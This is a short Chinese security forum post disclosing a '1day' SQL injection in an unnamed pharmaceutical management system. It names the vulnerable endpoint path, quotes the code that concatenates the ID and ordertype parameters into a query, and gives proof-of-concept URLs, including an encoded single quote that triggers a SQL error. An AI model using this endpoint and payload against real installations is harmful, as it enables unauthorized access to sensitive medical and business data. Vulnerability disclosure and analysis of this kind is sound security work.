【1day】某医药系统存在前台SQL注入漏洞-网络安全论坛-网络安全-阻击者联盟

【1day】某医药系统存在前台SQL注入漏洞

勾八徽章-人气大使-阻击者联盟等级-LV2-阻击者联盟3天前发布
30

0x01 漏洞分析

XX医药管理系统

d2b5ca33bd20250604131157

工具一把梭哈找前台接口,分析代码
/admin/caiwuchongxiao/OrderHandler.ashx

d2b5ca33bd20250604131211

context.Response.Write(GetData("list", context.Request["ID"].ToString(),
context.Request["ordertype"].ToString()));
接收 get 传参的 ID 和 ordertype 拼接到 sql 语句去执行
POC
/admin/caiwuchongxiao/OrderHandler.ashx?ID=1&ordertype=1

d2b5ca33bd20250604131251

单引号报错语法错误

/admin/caiwuchongxiao/OrderHandler.ashx?ID=1%27&ordertype=1

d2b5ca33bd20250604131311

 

评分
欢迎为Ta评分
分享
请登录后发表评论

    没有回复内容

zibll子比主题
本站同款主题模板
zibll子比主题是一款漂亮优雅的网站主题模板,功能强大,配置简单。
查看详情
发布帖子
在手机上浏览此页面